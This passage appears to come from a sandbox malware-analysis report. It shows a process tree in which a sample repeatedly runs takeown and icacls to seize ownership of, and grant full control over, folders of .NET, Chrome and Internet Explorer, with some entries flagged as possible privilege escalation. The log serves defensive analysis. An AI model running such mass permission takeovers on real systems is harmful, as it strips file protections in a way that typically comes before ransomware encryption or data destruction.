  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2" /grant Administrators:F
  2⤵
  PID:3048
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe" /a
  2⤵
  PID:1628
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe" /grant Administrators:F
  2⤵
  PID:2580
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App" /a
  2⤵
  PID:4960
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1416
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App" /grant Administrators:F
  2⤵
  PID:292
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27" /a
  2⤵
  PID:1400
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27" /grant Administrators:F
  2⤵
  PID:3864
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs" /a
  2⤵
  PID:3116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs" /grant Administrators:F
  2⤵
  PID:4464
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de" /a
  2⤵
  PID:3028
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4120
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de" /grant Administrators:F
  2⤵
  PID:2132
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es" /a
  2⤵
  PID:3872
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es" /grant Administrators:F
  2⤵
  PID:512
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr" /a
  2⤵
  PID:308
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr" /grant Administrators:F
  2⤵
  PID:2812
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it" /a
  2⤵
  PID:220
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it" /grant Administrators:F
  2⤵
  PID:2524
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ja" /a
  2⤵
  PID:4516
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ja" /grant Administrators:F
  2⤵
  PID:2624
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ko" /a
  2⤵
  PID:4352
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ko" /grant Administrators:F
  2⤵
  PID:2888
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3876
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pl" /a
  2⤵
  PID:336
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3032
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pl" /grant Administrators:F
  2⤵
  PID:3700
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR" /a
  2⤵
  PID:1652
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR" /grant Administrators:F
  2⤵
  PID:3144
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru" /a
  2⤵
  PID:1080
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru" /grant Administrators:F
  2⤵
  PID:3140
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\tr" /a
  2⤵
  PID:3296
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\tr" /grant Administrators:F
  2⤵
  PID:2348
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans" /a
  2⤵
  - Possible privilege escalation attempt
  PID:4368
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans" /grant Administrators:F
  2⤵
  PID:3156
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hant" /a
  2⤵
  PID:4572
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hant" /grant Administrators:F
  2⤵
  PID:1716
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16" /a
  2⤵
  PID:4016
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16" /grant Administrators:F
  2⤵
  PID:4056
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3192
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\cs" /a
  2⤵
  PID:220
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:308
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\cs" /grant Administrators:F
  2⤵
  PID:3784
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1400
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\de" /a
  2⤵
  PID:2872
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\de" /grant Administrators:F
  2⤵
  PID:3684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\es" /a
  2⤵
  PID:5052
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\es" /grant Administrators:F
  2⤵
  PID:1944
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\fr" /a
  2⤵
  PID:2908
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\fr" /grant Administrators:F
  2⤵
  PID:3840
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\it" /a
  2⤵
  PID:3008
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\it" /grant Administrators:F
  2⤵
  PID:2348
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja" /a
  2⤵
  PID:1804
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja" /grant Administrators:F
  2⤵
  PID:5012
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko" /a
  2⤵
  PID:1984
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko" /grant Administrators:F
  2⤵
  PID:3984
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl" /a
  2⤵
  PID:304
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl" /grant Administrators:F
  2⤵
  PID:2000
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pt-BR" /a
  2⤵
  PID:3808
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pt-BR" /grant Administrators:F
  2⤵
  PID:3288
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru" /a
  2⤵
  PID:2272
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru" /grant Administrators:F
  2⤵
  PID:2872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\tr" /a
  2⤵
  PID:4312
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\tr" /grant Administrators:F
  2⤵
  PID:3872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans" /a
  2⤵
  PID:4876
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3008
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hant" /a
  2⤵
  PID:5084
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hant" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2884
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2" /a
  2⤵
  PID:1544
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1804
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs" /a
  2⤵
  PID:928
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs" /grant Administrators:F
  2⤵
  PID:1172
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:336
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de" /a
  2⤵
  PID:8
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de" /grant Administrators:F
  2⤵
  PID:2904
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\es" /a
  2⤵
  PID:2720
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\es" /grant Administrators:F
  2⤵
  PID:3020
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr" /a
  2⤵
  PID:3028
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1652
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr" /grant Administrators:F
  2⤵
  PID:4368
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\it" /a
  2⤵
  PID:532
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2132
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\it" /grant Administrators:F
  2⤵
  PID:112
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ja" /a
  2⤵
  PID:4676
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2632
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ja" /grant Administrators:F
  2⤵
  PID:4572
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ko" /a
  2⤵
  PID:3700
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ko" /grant Administrators:F
  2⤵
  PID:5108
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pl" /a
  2⤵
  PID:2384
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pl" /grant Administrators:F
  2⤵
  PID:4392
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR" /a
  2⤵
  PID:2168
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR" /grant Administrators:F
  2⤵
  PID:280
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1080
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ru" /a
  2⤵
  PID:3808
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ru" /grant Administrators:F
  2⤵
  PID:1732
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\tr" /a
  2⤵
  PID:3028
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\tr" /grant Administrators:F
  2⤵
  PID:3508
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hans" /a
  2⤵
  PID:2772
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:292
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hans" /grant Administrators:F
  2⤵
  PID:4676
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hant" /a
  2⤵
  PID:4808
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hant" /grant Administrators:F
  2⤵
  PID:876
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\swidtag" /a
  2⤵
  PID:4928
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\swidtag" /grant Administrators:F
  2⤵
  PID:3140
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google" /a
  2⤵
  PID:3008
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google" /grant Administrators:F
  2⤵
  PID:2248
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome" /a
  2⤵
  PID:280
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome" /grant Administrators:F
  2⤵
  PID:112
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application" /a
  2⤵
  PID:956
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application" /grant Administrators:F
  2⤵
  PID:3464
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\chrome.exe" /a
  2⤵
  PID:4120
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\chrome.exe" /grant Administrators:F
  2⤵
  PID:5108
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60" /a
  2⤵
  PID:4312
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60" /grant Administrators:F
  2⤵
  PID:2248
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\chrome_pwa_launcher.exe" /a
  2⤵
  PID:2168
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\chrome_pwa_launcher.exe" /grant Administrators:F
  2⤵
  PID:300
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\default_apps" /a
  2⤵
  PID:4692
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\default_apps" /grant Administrators:F
  2⤵
  PID:3368
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Extensions" /a
  2⤵
  PID:1172
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Extensions" /grant Administrators:F
  2⤵
  PID:1184
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer" /a
  2⤵
  PID:3048
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer" /grant Administrators:F
  2⤵
  PID:3092
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3864
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\chrmstp.exe" /a
  2⤵
  PID:816
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\chrmstp.exe" /grant Administrators:F
  2⤵
  PID:5092
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Locales" /a
  2⤵
  PID:4120
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Locales" /grant Administrators:F
  2⤵
  PID:2108
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\MEIPreload" /a
  2⤵
  PID:3144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\MEIPreload" /grant Administrators:F
  2⤵
  PID:3972
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\PrivacySandboxAttestationsPreloaded" /a
  2⤵
  PID:4192
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\PrivacySandboxAttestationsPreloaded" /grant Administrators:F
  2⤵
  PID:2376
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\VisualElements" /a
  2⤵
  PID:116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\VisualElements" /grant Administrators:F
  2⤵
  PID:1984
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\WidevineCdm" /a
  2⤵
  PID:2300
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\WidevineCdm" /grant Administrators:F
  2⤵
  PID:928
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\WidevineCdm\_platform_specific" /a
  2⤵
  PID:3964
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\WidevineCdm\_platform_specific" /grant Administrators:F
  2⤵
  PID:4044
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\WidevineCdm\_platform_specific\win_x64" /a
  2⤵
  PID:5000
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60\WidevineCdm\_platform_specific\win_x64" /grant Administrators:F
  2⤵
  PID:3860
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\SetupMetrics" /a
  2⤵
  PID:300
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\SetupMetrics" /grant Administrators:F
  2⤵
  PID:4572
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:816
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer" /a
  2⤵
  PID:2548
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer" /grant Administrators:F
  2⤵
  PID:2836
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\ExtExport.exe" /a
  2⤵
  PID:3556
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\ExtExport.exe" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3964
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\de-DE" /a
  2⤵
  PID:3624
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\de-DE" /grant Administrators:F
  2⤵
  PID:4640
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\en-US" /a
  2⤵
  PID:4924
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\en-US" /grant Administrators:F
  2⤵
  PID:1492
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\es-ES" /a
  2⤵
  PID:956
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\es-ES" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:3412
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\fr-FR" /a
  2⤵
  PID:4572
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\fr-FR" /grant Administrators:F
  2⤵
  PID:4280
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\images" /a
  2⤵
  PID:5108
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\images" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1112
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\it-IT" /a
  2⤵
  PID:4132
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\it-IT" /grant Administrators:F
  2⤵
  PID:3508
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\ja-JP" /a
  2⤵
  PID:1944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\ja-JP" /grant Administrators:F
  2⤵
  PID:1732
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\SIGNUP" /a
  2⤵
  PID:2388
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\SIGNUP" /grant Administrators:F
  2⤵
  PID:1184
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\uk-UA" /a
  2⤵
  PID:2108
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\uk-UA" /grant Administrators:F
  2⤵
  PID:3840
- C:\windows\system32\takeown.exe
